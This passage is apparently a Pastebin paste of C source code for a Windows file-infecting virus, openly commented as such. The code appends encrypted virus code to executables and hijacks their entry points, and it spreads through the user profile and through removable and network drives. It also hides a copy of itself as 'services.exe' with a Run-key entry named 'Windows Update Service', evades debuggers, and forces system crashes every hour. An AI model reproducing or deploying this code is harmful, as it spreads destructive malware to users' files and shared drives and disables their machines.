  829.         hMap=CreateFileMapping(hFile,NULL,PAGE_READWRITE,0,NewSize,NULL);
  830.  
  831.         if(hMap)
  832.         {
  833.             MappedFile=MapViewOfFile(hMap,FILE_MAP_ALL_ACCESS,0,0,0);
  834.  
  835.             if(MappedFile)
  836.             {
  837.                 pIDH=(PIMAGE_DOS_HEADER)MappedFile;
  838.                 pINH=(PIMAGE_NT_HEADERS)((PUCHAR)MappedFile+pIDH->e_lfanew);
  839.  
  840.                 pISH=(PIMAGE_SECTION_HEADER)(pINH+1);
  841.                 pISH=&pISH[pINH->FileHeader.NumberOfSections-1];
  842.  
  843.                 ptr=(PUCHAR)MappedFile+pISH->PointerToRawData+pISH->SizeOfRawData;
  844.  
  845.                 pISH->Misc.VirtualSize+=SectionSize;
  846.                 pISH->SizeOfRawData=Align(pISH->SizeOfRawData+SectionSize,pINH->OptionalHeader.FileAlignment);
  847.                 pISH->Characteristics|=IMAGE_SCN_MEM_EXECUTE;
  848.  
  849.                 pINH->OptionalHeader.SizeOfImage=pISH->VirtualAddress+pISH->Misc.VirtualSize;
  850.  
  851.                 CodeAddress=ptr;
  852.                 <span class="searchlite">Virus</span>Address=CodeAddress+CodeSize;
  853.  
  854.                 memcpy(CodeAddress,PeType==PeDll ? (PVOID)Dll<span class="searchlite">Virus</span>Code:Exe<span class="searchlite">Virus</span>Code,CodeSize); // Write the <span class="searchlite">virus</span> code to the file
  855.                 memcpy(<span class="searchlite">Virus</span>Address,<span class="searchlite">Virus</span>File,<span class="searchlite">Virus</span>Size); // Write the <span class="searchlite">virus</span> body to the file
  856.  
  857.                 // Fill up placeholders
  858.  
  859.                 for(i=0;i<CodeSize;i++)
  860.                 {
  861.                     if(CodeAddress[i]==0xb8 && *(PULONG)&CodeAddress[i+1]==0x41414141)
  862.                     {
  863.                         *(PULONG)&CodeAddress[i+1]=pINH->OptionalHeader.AddressOfEntryPoint;
  864.                     }
  865.  
  866.                     if(CodeAddress[i]==0xb8 && *(PULONG)&CodeAddress[i+1]==0x42424242)
  867.                     {
  868.                         *(PULONG)&CodeAddress[i+1]=(ULONG)<span class="searchlite">Virus</span>Address-pISH->PointerToRawData+pISH->VirtualAddress-(ULONG)MappedFile;
  869.                     }
  870.  
  871.                     if(CodeAddress[i]==0xb8 && *(PULONG)&CodeAddress[i+1]==0x43434343)
  872.                     {
  873.                         *(PULONG)&CodeAddress[i+1]=<span class="searchlite">Virus</span>Size;
  874.                     }
  875.                 }
  876.  
  877.                 // Encrypt the virus
  878.  
  879.                 Key=pINH->FileHeader.TimeDateStamp;
  880.                 RC4(<span class="searchlite">Virus</span>Address,<span class="searchlite">Virus</span>Size,&Key);
  881.  
  882.                 pINH->OptionalHeader.AddressOfEntryPoint=(ULONG)CodeAddress-pISH->PointerToRawData+pISH->VirtualAddress-(ULONG)MappedFile; // Set the entry point
  883.                 wcscpy((PWSTR)(pIDH+1),<span class="searchlite">VIRUS</span>_MARKER); // Write the infection marker to the DOS stub
  884.  
  885.                 // Compute the new checksum
  886.  
  887.                 if(CheckSumMappedFile(MappedFile,NewSize,&OldChecksum,&NewChecksum))
  888.                 {
  889.                     pINH->OptionalHeader.CheckSum=NewChecksum; // Update the checksum
  890.                 }
  891.  
  892.                 FlushViewOfFile(MappedFile,0); // Flush the changes into file
  893.                 UnmapViewOfFile(MappedFile); // Unmap the file
  894.             }
  895.         }
  896.     }
  897.  
  898.     NtClose(hMap);
  899.     NtClose(hFile);
  900. }
  901.  
  902. void __fastcall SearchFile(PWSTR Directory)
  903. {
  904.     HANDLE hFind;
  905.     WIN32_FIND_DATA FindData;
  906.  
  907.     wchar_t SearchName[1024],FullPath[1024];
  908.     LARGE_INTEGER delay;
  909.  
  910.     delay.QuadPart=(__int64)-10*10000;
  911.  
  912.     memset(SearchName,0,sizeof(SearchName));
  913.     memset(&FindData,0,sizeof(WIN32_FIND_DATA));
  914.  
  915.     swprintf(SearchName,L"%s\\*",Directory);
  916.  
  917.     hFind=FindFirstFile(SearchName,&FindData);
  918.  
  919.     if(hFind!=INVALID_HANDLE_VALUE)
  920.     {
  921.         while(FindNextFile(hFind,&FindData))
  922.         {
  923.             if(FindData.cFileName[0]=='.')
  924.             {
  925.                 continue;
  926.             }
  927.              
  928.             memset(FullPath,0,sizeof(FullPath));
  929.             swprintf(FullPath,L"%s\\%s",Directory,FindData.cFileName);
  930.  
  931.             if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
  932.             {
  933.                 SearchFile(FullPath);
  934.             }
  935.  
  936.             else
  937.             {
  938.                 InfectFile(FullPath);
  939.             }
  940.  
  941.             NtDelayExecution(FALSE,&delay);
  942.         }
  943.  
  944.         FindClose(hFind);
  945.     }
  946. }
  947.  
  948. void NTAPI TlsCallback(PVOID Module,ULONG Reason,PVOID Context)
  949. {
  950.     HKEY hKey;
  951.     PLDR_DATA_TABLE_ENTRY Ldr;
  952.  
  953.     BOOLEAN IsAdmin,bl;
  954.  
  955.     PPEB Peb=(PPEB)__readfsdword(0x30);
  956.     ULONG_PTR DebugPort=0;
  957.  
  958.     if(Reason!=DLL_PROCESS_ATTACH)
  959.     {
  960.         return;
  961.     }
  962.      
  963.     if(Peb->BeingDebugged)
  964.     {
  965.         NtTerminateProcess(NtCurrentProcess(),0);
  966.         while(1);
  967.     }
  968.  
  969.     if(NT_SUCCESS(NtQueryInformationProcess(NtCurrentProcess(),ProcessDebugPort,&DebugPort,sizeof(ULONG_PTR),NULL)))
  970.     {
  971.         if(DebugPort)
  972.         {
  973.             NtTerminateProcess(NtCurrentProcess(),0);
  974.             while(1);
  975.         }
  976.     }
  977.  
  978.     Ldr=CONTAINING_RECORD(Peb->Ldr->InMemoryOrderModuleList.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink);
  979.     IsAdmin=NT_SUCCESS(RtlAdjustPrivilege(20,TRUE,FALSE,&bl));
  980.  
  981.     ExpandEnvironmentStrings(IsAdmin ? L"%windir%\\services.exe":L"%temp%\\services.exe",<span class="searchlite">Virus</span>Path,60);
  982.     CopyFile(Ldr->FullDllName.Buffer,<span class="searchlite">Virus</span>Path,FALSE); // Copy the <span class="searchlite">virus</span> to temp folder
  983.  
  984.     SetFileAttributes(<span class="searchlite">Virus</span>Path,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
  985.  
  986.     // Add the <span class="searchlite">virus</span> to registry
  987.  
  988.     if(!RegCreateKey(IsAdmin ? HKEY_LOCAL_MACHINE:HKEY_CURRENT_USER,L"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey))
  989.     {
  990.         RegSetValueEx(hKey,L"Windows Update Service",0,REG_SZ,(PUCHAR)<span class="searchlite">Virus</span>Path,sizeof(<span class="searchlite">Virus</span>Path));
  991.         RegCloseKey(hKey);
  992.     }
  993. }
  994.  
  995. __declspec(allocate(".CRT$XLB")) PIMAGE_TLS_CALLBACK TlsCallbackAddress[]={TlsCallback,NULL};
  996.  
  997. DWORD WINAPI ZeroX(PVOID p)
  998. {
  999.     BOOLEAN bl;
  1000.     LARGE_INTEGER delay;
  1001.  
  1002.     ULONG Response;
  1003.      
  1004.     PPEB Peb=(PPEB)__readfsdword(0x30);
  1005.     ULONG_PTR DebugPort=0;
  1006.  
  1007.     delay.QuadPart=(__int64)-10*10000;
  1008.  
  1009.     while(1)
  1010.     {
  1011.         if(Peb->BeingDebugged)
  1012.         {
  1013.             break;
  1014.         }
  1015.  
  1016.         if(NT_SUCCESS(NtQueryInformationProcess(NtCurrentProcess(),ProcessDebugPort,&DebugPort,sizeof(ULONG_PTR),NULL)))
  1017.         {
  1018.             if(DebugPort)
  1019.             {
  1020.                 break;
  1021.             }
  1022.         }
  1023.  
  1024.         NtDelayExecution(FALSE,&delay);
  1025.     }
  1026.  
  1027.     RtlAdjustPrivilege(19,TRUE,FALSE,&bl);
  1028.     NtRaiseHardError(0xC000026A,0,0,NULL,OptionShutdownSystem,&Response);
  1029.  
  1030.     while(1);
  1031. }
  1032.  
  1033. DWORD WINAPI InfectUserProfile(PVOID p)
  1034. {
  1035.     wchar_t UserProfile[1024];
  1036.     LARGE_INTEGER delay;
  1037.  
  1038.     delay.QuadPart=(__int64)-600000*10000;
  1039.     GetEnvironmentVariable(L"userprofile",UserProfile,1024); // Get the path of user profile
  1040.      
  1041.     while(1)
  1042.     {
  1043.         SearchFile(UserProfile); // Search for files to infect
  1044.         NtDelayExecution(FALSE,&delay);
  1045.     }
  1046. }
  1047.  
  1048. DWORD WINAPI InfectDrives(PVOID p)
  1049. {
  1050.     ULONG DriveType;
  1051.     wchar_t drives[1024],*str;
  1052.  
  1053.     LARGE_INTEGER delay;
  1054.  
  1055.     delay.QuadPart=(__int64)-600000*10000;
  1056.  
  1057.     while(1)
  1058.     {
  1059.         memset(drives,0,sizeof(drives));
  1060.  
  1061.         GetLogicalDriveStrings(sizeof(drives),drives); // Get all drives
  1062.         str=drives;
  1063.  
  1064.         while(*str)
  1065.         {
  1066.             DriveType=GetDriveType(str); // Check the drive type
  1067.  
  1068.             // Infect removable and network drives
  1069.  
  1070.             if(DriveType==DRIVE_REMOVABLE || DriveType==DRIVE_REMOTE)
  1071.             {
  1072.                 SearchFile(str); // Search for files to infect
  1073.             }
  1074.  
  1075.             str+=wcslen(str)+1; // Get the next drive
  1076.         }
  1077.  
  1078.         NtDelayExecution(FALSE,&delay);
  1079.     }
  1080. }
  1081.  
  1082. int WINAPI wWinMain(HINSTANCE hInst,HINSTANCE hPrev,LPWSTR lpCmdLine,int nCmdShow)
  1083. {
  1084.     HANDLE hFile;
  1085.     ULONG Response,read,op;
  1086.  
  1087.     BOOLEAN bl;
  1088.  
  1089.     SYSTEMTIME Time;
  1090.     LARGE_INTEGER delay;
  1091.  
  1092.     CreateMutex(NULL,TRUE,L"{CFC9E0B8-3AB0-4FB0-9301-230E623A09FD}");
  1093.  
  1094.     if(GetLastError()==ERROR_ALREADY_EXISTS)
  1095.     {
  1096.         NtTerminateProcess(NtCurrentProcess(),0);
  1097.         while(1);
  1098.     }
  1099.  
  1100.     hFile=CreateFile(<span class="searchlite">Virus</span>Path,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,0,NULL);
  1101.  
  1102.     if(hFile!=INVALID_HANDLE_VALUE)
  1103.     {
  1104.         <span class="searchlite">Virus</span>Size=GetFileSize(hFile,NULL);
  1105.         <span class="searchlite">Virus</span>File=VirtualAlloc(NULL,<span class="searchlite">Virus</span>Size,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
  1106.  
  1107.         if(<span class="searchlite">Virus</span>File)
  1108.         {
  1109.             if(!ReadFile(hFile,<span class="searchlite">Virus</span>File,<span class="searchlite">Virus</span>Size,&read,NULL))
  1110.             {
  1111.                 NtClose(hFile);
  1112.                 return -1;
  1113.             }
  1114.         }
  1115.  
  1116.         NtClose(hFile);
  1117.         VirtualProtect(<span class="searchlite">Virus</span>File,<span class="searchlite">Virus</span>Size,PAGE_READONLY,&op); // Protect the <span class="searchlite">virus</span> data
  1118.     }
  1119.  
  1120.     <span class="searchlite">Virus</span>FileChecksum=ComputeHash(<span class="searchlite">Virus</span>File,<span class="searchlite">Virus</span>Size);
  1121.  
  1122.     // Create worker threads
  1123.      
  1124.     CreateThread(NULL,0,ZeroX,NULL,0,NULL);
  1125.     CreateThread(NULL,0,InfectUserProfile,NULL,0,NULL);
  1126.     CreateThread(NULL,0,InfectDrives,NULL,0,NULL);
  1127.  
  1128.     delay.QuadPart=(__int64)-10*10000;
  1129.  
  1130.     while(1)
  1131.     {
  1132.         memset(&Time,0,sizeof(SYSTEMTIME));
  1133.         GetLocalTime(&Time);
  1134.  
  1135.         if(!Time.wMinute && !Time.wSecond)
  1136.         {
  1137.             RtlAdjustPrivilege(19,TRUE,FALSE,&bl);
  1138.             NtRaiseHardError(0xC000001E,0,0,NULL,OptionShutdownSystem,&Response);
  1139.         }
  1140.  
  1141.         NtDelayExecution(FALSE,&delay);
  1142.     }
  1143. }
Tags: rohitab.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!